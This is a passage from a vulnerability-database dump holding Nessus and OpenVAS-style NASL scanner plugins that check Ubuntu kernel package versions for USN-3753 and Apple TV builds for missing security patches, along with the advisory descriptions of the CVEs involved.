security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-generic\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-generic-lpae\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-lowlatency\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc-e500mc\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc-smp\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc64-emb\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc64-smp\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1028.28\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:42:09", "bulletinFamily": "scanner", "description": "USN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not properly enforce permissions on kernel memory access. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the Linux kernel contained a buffer overflow when handling extended attributes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly handle an error condition with a corrupted xfs image. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file creation when performed by a non-member of the group. A local attacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the Linux kernel contained an integer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-13406).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-3753-2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=112112", "published": "2018-08-24T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-xenial, linux-aws vulnerabilities (USN-3753-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3753-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112112);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/12/01 15:12:42\");\n\n script_cve_id(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10879\", \"CVE-2018-10881\", \"CVE-2018-10882\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n script_xref(name:\"USN\", value:\"3753-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial, linux-aws vulnerabilities (USN-3753-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly enforce permissions on kernel memory access. A local\nattacker could use this to expose sensitive information or possibly\nelevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could\nuse this to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in\nthe ext4 filesystem implementation in the Linux kernel. An attacker\ncould use this to construct a malicious ext4 image that, when mounted,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in\nthe Linux kernel contained a buffer overflow when handling extended\nattributes. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid\nfile creation when performed by a non-member of the group. A local\nattacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in\nthe Linux kernel contained an integer overflow. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2018-13406).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3753-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-1028-aws\", pkgver:\"4.4.0-1028.31\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-134-generic\", pkgver:\"4.4.0-134.160~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-134-generic-lpae\", pkgver:\"4.4.0-134.160~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-134-lowlatency\", pkgver:\"4.4.0-134.160~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1028.28\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lpae-lts-xenial\", pkgver:\"4.4.0.134.114\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lts-xenial\", pkgver:\"4.4.0.134.114\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency-lts-xenial\", pkgver:\"4.4.0.134.114\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-aws / linux-image-4.4-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:42:08", "bulletinFamily": "scanner", "description": "It was discovered that the generic SCSI driver in the Linux kernel did not properly enforce permissions on kernel memory access. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the Linux kernel contained a buffer overflow when handling extended attributes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly handle an error condition with a corrupted xfs image. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file creation when performed by a non-member of the group. A local attacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the Linux kernel contained an integer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-13406).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-3753-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=112111", "published": "2018-08-24T00:00:00", "title": "Ubuntu 16.04 LTS : linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities (USN-3753-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3753-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112111);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/12/01 15:12:42\");\n\n script_cve_id(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10879\", \"CVE-2018-10881\", \"CVE-2018-10882\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n script_xref(name:\"USN\", value:\"3753-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities (USN-3753-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the generic SCSI driver in the Linux kernel did\nnot properly enforce permissions on kernel memory access. A local\nattacker could use this to expose sensitive information or possibly\nelevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could\nuse this to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in\nthe ext4 filesystem implementation in the Linux kernel. An attacker\ncould use this to construct a malicious ext4 image that, when mounted,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in\nthe Linux kernel contained a buffer overflow when handling extended\nattributes. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid\nfile creation when performed by a non-member of the group. A local\nattacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in\nthe Linux kernel contained an integer overflow. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2018-13406).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3753-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1032-kvm\", pkgver:\"4.4.0-1032.38\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1066-aws\", pkgver:\"4.4.0-1066.76\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1095-raspi2\", pkgver:\"4.4.0-1095.103\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1099-snapdragon\", pkgver:\"4.4.0-1099.104\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-134-generic\", pkgver:\"4.4.0-134.160\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-134-generic-lpae\", pkgver:\"4.4.0-134.160\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-134-lowlatency\", pkgver:\"4.4.0-134.160\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1066.68\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic\", pkgver:\"4.4.0.134.140\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.4.0.134.140\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.4.0.1032.31\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.4.0.134.140\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.4.0.1095.95\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.4.0.1099.91\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-aws / linux-image-4.4-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:27:30", "bulletinFamily": "scanner", "description": "According to its banner, the version of the remote Apple TV device is prior to 9.2.2. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - CoreGraphics\n - ImageIO\n - IOAcceleratorFamily\n - IOHIDFamily\n - Kernel\n - libxml2\n - libxslt\n - Sandbox Profiles\n - WebKit\n - WebKit Page Loading\n\nNote that only 4th generation models are affected by the vulnerabilities.", "modified": "2018-12-14T00:00:00", "id": "APPLETV_9_2_2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=92494", "published": "2016-07-21T00:00:00", "title": "Apple TV < 9.2.2 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92494);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/12/14 14:58:47\");\n\n script_cve_id(\n \"CVE-2016-1684\",\n \"CVE-2016-1836\",\n \"CVE-2016-1863\",\n \"CVE-2016-1865\",\n \"CVE-2016-4447\",\n \"CVE-2016-4448\",\n \"CVE-2016-4449\",\n \"CVE-2016-4483\",\n \"CVE-2016-4582\",\n \"CVE-2016-4583\",\n \"CVE-2016-4584\",\n \"CVE-2016-4585\",\n \"CVE-2016-4586\",\n \"CVE-2016-4587\",\n \"CVE-2016-4588\",\n \"CVE-2016-4589\",\n \"CVE-2016-4591\",\n \"CVE-2016-4592\",\n \"CVE-2016-4594\",\n \"CVE-2016-4607\",\n \"CVE-2016-4608\",\n \"CVE-2016-4609\",\n \"CVE-2016-4610\",\n \"CVE-2016-4612\",\n \"CVE-2016-4614\",\n \"CVE-2016-4615\",\n \"CVE-2016-4616\",\n \"CVE-2016-4619\",\n \"CVE-2016-4622\",\n \"CVE-2016-4623\",\n \"CVE-2016-4624\",\n \"CVE-2016-4626\",\n \"CVE-2016-4627\",\n \"CVE-2016-4631\",\n \"CVE-2016-4632\",\n \"CVE-2016-4637\",\n \"CVE-2016-4642\",\n \"CVE-2016-4643\",\n \"CVE-2016-4644\",\n \"CVE-2016-4653\"\n );\n script_bugtraq_id(\n 90013,\n 90856,\n 90864,\n 90865,\n 90876,\n 91358,\n 91826,\n 91827,\n 91828,\n 91830,\n 91831,\n 91834\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2016-07-18-4\");\n\n script_name(english:\"Apple TV < 9.2.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of the remote Apple TV device is\nprior to 9.2.2. It is, therefore, affected by multiple vulnerabilities\nin the following components :\n\n - CoreGraphics\n - ImageIO\n - IOAcceleratorFamily\n - IOHIDFamily\n - Kernel\n - libxml2\n - libxslt\n - Sandbox Profiles\n - WebKit\n - WebKit Page Loading\n\nNote that only 4th generation models are affected by the\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT206905\");\n # https://lists.apple.com/archives/security-announce/2016/Jul/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c0647e9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 9.2.2 or later. Note that this update is\nonly available for 4th generation models.\");\n 